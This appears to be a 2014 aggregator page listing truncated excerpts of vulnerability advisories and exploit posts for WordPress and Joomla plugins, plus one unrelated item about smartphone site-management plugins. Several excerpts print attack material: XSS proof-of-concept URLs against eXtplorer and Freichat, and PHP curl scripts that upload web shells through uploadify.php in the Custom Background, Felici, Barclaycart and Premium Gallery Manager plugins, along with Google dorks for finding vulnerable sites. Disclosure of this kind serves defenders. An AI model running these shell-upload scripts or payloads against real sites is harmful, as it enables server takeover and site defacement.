WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

3 April 2014 - Source: http://www.mondounix.com
Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are many more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected...


WordPress plugins for managing sites from a smartphone

1 April 2014 - Source: http://www.travagliante.com


The widespread adoption of modern electronic devices has vastly enlarged the market in which manufacturers operate, and they must cope with a constantly growing number of users. Thanks to the wide range of smartphone and tablet offers, the needs and requirements to be met are growing along with the audience, since...


Joomla Kunena 3.0.4 Cross Site Scripting

28 March 2014 - Source: http://www.mondounix.com
Persistent XSS in Joomla::Kunena 3.0.4
26. February 2014
by Qoppa
 
+++ Description
 
"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."
 
Kunena is written in PHP. Users can post a Google Map using the following BBCode
  [map]content[/map]
 
Kunena creates a JavaScript based on input, but doesn't decode it correctly.
 
 
+++ Analysis
 
Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)
 
1049  function DoMap($bbcode, $action, $name, $default, $params, $content) {
  ...
1078  $document->addScriptDeclaration("
1079  // <![CDATA[
  ...
1097  var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE',...


WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

25 March 2014 - Source: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Proof:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch,...


WordPress Felici / Custom Background Shell Upload

25 March 2014 - Source: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Proof:
-------------------------------------------------------------------------------------
<?php
 
$uploadfile="cafc.php.jpg";
 
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch,...


Joomla eXtplorer 2.1.3 Cross Site Scripting

21 March 2014 - Source: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer
2.1.3 component for Joomla! allow remote attackers to inject arbitrary web
script or HTML code via a crafted string in the URL
to application.js.php, admin.php, copy_move.php,
functions.php, header.php and upload.php.
 
File: /scripts/application.js.php
Line: 45
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
 
File: /include/admin.php
Lines: 72, 143, 176 and 210
POC:
http://site/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin
 
 
File:...


Joomla Freichat Cross Site Scripting

21 March 2014 - Source: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in Freichat
component for Joomla! allow remote attackers to inject
arbitrary web script or HTML code via (1) the id or xhash parameters to
/client/chat.php or (2) the toname parameter to /client/plugins/upload/upload.php.
 
 
File: /client/chat.php
Line: 53
POC:
http://site/client/chat.php?id=1"
></script><script>alert('XSS
1')</script>&xhash=1" <script>alert('XSS
2')</script>
 
 
File: /client/plugins/upload/upload.php
Line: 91
POC:
   </style>
    <body>
        <div
class="frei_upload_border">
        <form name="upload"
action="http://site/client/plugins/upload/upload.php"
method="post"...


WordPress LayerSlider 4.6.1 CSRF / Traversal

12 March 2014 - Source: http://www.mondounix.com
==========================================================
WordPress plugin LayerSlider WP Version 4.6.1 (possibly all versions) 
suffers from CSRF and from Directory Traversal vulnerabilities.
 
AFAIK multiple WordPress themes use this plugin.
And one of them is the satellite - v1.0.2 WordPress theme.
==========================================================
 
Tested on:
Server version: Apache/2.4.7 (Fedora)
Server built:   Mar  3 2014 12:12:09
 
$ php -v
PHP 5.5.10 (cli) (built: Mar  5 2014 17:13:58) 
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
 
Wordpress 3.8.1 (Fresh install)
 
Theme Default package: satellite - v1.0.2 + LayerSlider WP Version 4.6.1...


WordPress Barclaycart Shell Upload

10 March 2014 - Source: http://www.mondounix.com
                        WordPress Barclaycart Plugins Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/barclaycart"
#
#######################################################################################
 
Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",...


WordPress Premium Gallery Manager Shell Upload

8 March 2014 - Source: http://www.mondounix.com
          Wordpress Plugins Premium Gallery Manager Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager"
#
#######################################################################################
 
Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
...
